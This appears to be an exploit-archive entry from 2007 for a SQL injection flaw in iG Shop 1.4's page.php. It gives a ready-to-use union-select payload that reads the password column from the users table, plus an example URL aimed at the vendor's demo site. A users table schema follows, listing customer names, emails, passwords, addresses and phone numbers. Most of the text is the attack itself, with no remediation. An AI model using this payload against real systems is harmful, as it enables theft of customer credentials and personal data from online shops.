iG Shop 1.4 (page.php) Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : iG Shop 1.4 (page.php) Remote SQL Injection Vulnerability
# Published : 2007-05-12
# Author : gsy
# Previous Title : PHP FirstPost 0.1 (block.php Include) Remote File Inclusion Exploit
# Next Title : YAAP <= 1.5 __autoload() Remote File Inclusion Vulnerability

Discovered by: gsy & kerem125
Website: www.kerem125.com

Script Download: http://www.igeneric.co.uk/ig-shopping-cart.html

exploit:/shop/page.php?page_type=catalog_navigate&type_id[]=-99%20union/**/select/**/password/**/from/**/users/*

example:http://shop.igeneric.co.uk/shop/page.php?page_type=catalog_navigate&type_id[]=-99%20union/**/select/**/password/**/from/**/users/*

contact: by_gsy@hotmail.com & kerem125@kerem125.com
Special thx to:by_emr3 , ercu_145, bolivar, voltigore, f10

# user_id int(11) NOT NULL auto_increment,
# fname varchar(50) NOT NULL default '',
# lname varchar(50) NOT NULL default '',
# email varchar(100) NOT NULL default '',
# password varchar(100) NOT NULL default '',
# salutation varchar(5) NOT NULL default '',
# bill_address varchar(200) NOT NULL default '',
# bill_address_2 varchar(100) NOT NULL default '',
# bill_city varchar(50) NOT NULL default '',
# bill_post_code varchar(15) NOT NULL default '',
# bill_country varchar(20) NOT NULL default '',
# bill_phone varchar(15) NOT NULL default '',
# ship_address varchar(200) NOT NULL default '',
# ship_address_2 varchar(100) NOT NULL default '',
# ship_city varchar(50) NOT NULL default '',
# ship_post_code varchar(15) NOT NULL default '',
# ship_country varchar(20) NOT NULL default '',
# ship_phone varchar(15) NOT NULL default '',

# www.Syue.com [2007-05-12]